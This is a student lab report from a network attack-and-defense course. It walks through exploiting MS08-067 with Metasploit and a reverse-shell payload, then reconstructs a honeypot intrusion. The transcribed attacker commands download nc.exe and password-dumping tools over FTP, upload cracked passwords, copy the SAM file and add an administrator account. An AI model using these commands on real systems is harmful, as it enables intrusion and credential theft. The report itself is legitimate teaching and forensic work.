20212909 2021-2022-2 《网络攻防实践》第六次作业

一.实践内容

• 动手实践Metasploit windows attacker


• 取证分析实践：解码一次成功的NT系统破解攻击。


• 团队对抗实践：windows系统远程渗透攻击和分析。
  
  实验环境

二.实践过程

1.动手实践Metasploit windows attacker

• 任务：使用msfconsole软件进行windows远程渗透统计实验。
  
  （1）在kali中输入 msfconsole进入metasploit。
  
  
  
  （2）输入命令search ms08_067查找ms08_067漏洞，可以得到针对该漏洞的渗透攻击模块，再执行命令：use exploit/windows/smb/ms08_067_netapi表示我们将攻击的漏洞。
  
  
  
  
  
  （3）输入show options,查看攻击此漏洞需要的设置。
  
  
  
  （4）输入show payloads,显示此漏洞的载荷，选择第三个载荷进行攻击
  
  
  
  （5）输入命令set payload generic/shell_reverse_tcp设置载荷，输入set RHOST 192.168.200.124设置攻击对象IP、输入set LHOST 192.168.200.6设置本机IP，输入exploit进行爆破，出现会话连接表示攻击成功。
  
  浏览wireshark抓包情况可知攻击利用的漏洞有，针对SMB网络服务的漏洞DCERPC解析器拒绝服务漏洞，SPOOLSS打印服务假冒漏洞。
  
  
  
  （6）输入ipconfig/all查看靶机所以的ip配置，攻击成功。
  
  
  
  （7）打开wireshark，查看抓包，可见源地址为192.168.200.6，源端口为39993，目的地址为192.168.200.124，目的端口为445，攻击发起时间从ARP协议的询问开始。
  
  
  
  
  
  （8）查看wireshark抓包的TCP流，可以看到靶机中输入的命令行被抓取。
  
  
  
  
  
  

2. 取证分析实践：解码一次成功的NT系统破解攻击。

• 任务
  
  来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
  
  攻击者使用了什么破解工具进行攻击
  
  攻击者如何使用这个破解工具进入并控制了系统
  
  攻击者获得系统访问权限后做了什么
  
  我们如何防止这样的攻击
  
  你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么
  
  （1）使用wireshark打开实验材料snort-0204@0117.log文件
  
  
  
  （2）以ip.addr=172.16.1.106 and http为筛选条件查看数据包
  
  
  
  （3）查看编号111的数据报，查看其TCP数据流，其中boot.ini是NT系统的启动文件,..%c0af..是"/"的Unicode编码。这是IIS存在的一个漏洞。说明攻击者通过IIS Unicode漏洞了解了被攻击主机操作系统的一些基本情况
  
  
  
  
  
  （4）继续跟踪数据流找到msadc,查看tcp流，发现有shell和！ADM则有rds漏洞
  
  
  
  
  
  （4）整理shell代码
  
  shell ("cmd /c echo werd >> c: fu n);
  
  shell("cmd /c echo user johna2k > ftpcom")
  
  shell("cmd /c echo hacker 2000 >> ftpcom")
  
  shell("cmd /c echo get pump.exe >> ftpcom"
  
  shell ("cmd /c echo get nc.exe>>{tpcom");
  
  shell ("cmd /c echo quit>>ftpcom")
  
  shell("cmd /c ftp - s : ftpcom- n www.nether.net");
  
  shell ("cmd /c pdump .exe>>new.pass" )
  
  shell ("cmd /c echo userjohna2k > ftpcom2)
  
  shell ("md /c echo hacker2000>>ftpcom2)
  
  shell("cmd /c put new . pass>>ftpcom2)
  
  shell("cmd /c echo quit>>ftpcom2)
  
  shell("cmd /c ftp -S : ftpcom2 - n www.nether.net");
  
  shell("cmd /c ftp 213.116.251.162)
  
  shell ("cmd /c echo open 213.116.251.162 > ftpcom " );
  
  shell ("cmd /c echo johna2k > ftpcom")
  
  shell ("cmd /c echo hacker2000>>ftpcom)
  
  shell ("cmd /c echo get samdump.dIl>>ftpcom")
  
  shell("cmd /c echo get pdump.exe>>ftpcom")
  
  shell ("cmd /c echo get nc.exe>>itpcom)
  
  shell("cmd /c echo quit>>ftpcom")
  
  第一、二段中使用ftpcom可知攻击机打开IP213.116.251.162，使用ftp的方式下载文件，pdump.exe和samdump.dll是配合使用破解口令的，samdump.dll拿到口令pdump.exe破解，SAM文件通过安全表示进行账号安全管理文件。
  
  注：本地特权提升采用dll注入或破解程序漏洞得到。

shell ( "cmd /c open 212.139.12.26)

shell("cmd /c echo iohna2k>>sasfile)

shell ("cmd /c echo haxedj00>>sasfile)

shell("cmd /c echo get pdump.exe>>sasfile)

shell("cmd /c echo get samdump.dIl>>sasfile)

shell ( "cmd /c echo get nc.exe>>sasfile)

shell ("cmd /c echo quit>>sasfile)

shell ("cmd /c ftp - s : sasfile ")

shell ( "cmd /c open 213.116.251.162 ")

shell ("cmd /c echo johna2k>>sasfile)

shell("cmd /c echo haxedi00>>sasfile)

shell ( "cmd /c echo get pdump.exe>>sasfile)

shell ( "cmd /c echo get samdump.dil>>sasfile)

shell ("cmd /c echo get nc.exe>>sasfile)

shell("cmd /c echo quit>>sasfile)

第二段和第三段中sasfile为高效读入数据的方式，因此为IP分别为212.139.12.26和213.116.251.162号入了文件，值得注意的是nc.exe文件是一个远程入侵的后门程序，便于下次攻击；

再继续分析msadcs.dll的shell命令，整理如下

＃注意关键字ProgramFiles

shell (" cmd / c C: ProgramFiles CommonFiles system msadc pump.exe > > yay.txt)

shell (" cmd / c C: ProgramFiles CommonFiles system made pdump.ex > > yay.txt " )

＃创建会话写入文件yay.txt

shell ("cmd/ c pdump.exe >> c: yay.txt)

shell ("cmd / c net session > > yay2.txt ")

shell("cmd / c net session > > yay2.txt ")

shell("cmd /c net users > > heh.txt")

shell("cmd /c net users >> c: heh.txt ")

＃创建用户组提升自己的访问权限

shell ("/ c net localgroup Domain Admin I WAM_ KENNY / ADD " )

shell (" / c net user testuser UgotHacked / A D D")

shell ( "/ c net localgroup Administrators testuser / A D D" )

从上边的shell命令可以看到攻击机进入靶机之后查看了一些系统文件，注意关键字ProgramFiles;然后创建会话写入文件yay.txt,注意到前面有pdump.exe，这是

上一步中提到的口令破解文件，因此猜测创建的会话将破解的口令写入文件yay.txt中;

再继续分析msadcs.dll的sthell命令，整理如下：

shell("cmd/crdisk-/s")

shell("cmd / crdisk -s)

shell("cmd / crdisk")

shell("cmd/crdisk-/s")

shell("cmd / crdisk - s")

shell("cmd / crdisk / S -")

shell("cmd / crdisk/s-")

shell ("cmd / crdisk/s")

＃试图朋除和拷贝SAM中的数据（删除和拷贝har.txt)

shell("cmd / c typec: winnt repair sam.> > C: har.txt )

shell("cmd / c delc : inetpub wwwroot har.txt")

shell ("cmd/ c delc: inetpub wwwroot har.txt)

接下来是要创建了用户组等提升攻击机的访问权限；然后利用磁盛修复工具包中的rdisk工具创建SAM文件副本（SAM文件中可是安全账号管理哦！）可以发现创建的口令来来回回执行了好几次，猜测这个攻击者这步操作不是很顺利？！毕竟是SAM文件！然后是尝试删除和拷贝SAM文件中的数据即删除和拷贝har.txt文件；

（5）查看NO.1233的tcp流发现端口6969是木马Gatecrasher、Priority开放的端口。











以上的NT分析给了我们提醒如果我们的主机被攻击了怎么办，所以我们需要防范措施如下：

• 首先肯定是自身的口令要是强口令，这样可以增大破解口令难度；


• 然后是定期的打补丁，修复漏洞；


• 最后是要定期的扫描自身的主机，查看是否存在漏洞等危险。

3.团队对抗实践：windows系统远程渗透攻击和分析。

我和20212908yxy完成的这项实验

• 攻击
  
  （1）首先ping对方靶机IP，正常可以ping通
  
  
  
  （2）重复任务1命令进行攻击，攻击成功
  
  
  
  
  
  （3）输入echo . > 20212909ghh.txt创建一个.txt文件，这是从yxy同学电脑截的图，表示攻击成功
  
  


• 防守
  
  （1）yxy同学攻击我的主机IP成功
  
  
  
  （2）根据wiresharkTCP流分析可知其攻击创建文件夹的命令
  
  

三.学习中遇到的问题

Pa.在攻防的时候，靶机IP改不了

Sloua:之前靶机IP设定的固定IP，需要改成动态获取IP

四.实践总结

本次实验动手实践了使用msf渗透主机的过程，了解了这个工具的使用，也仔细分析了一次成功的NT系统破解攻击，同时和同学完成了一次简单的网络攻防。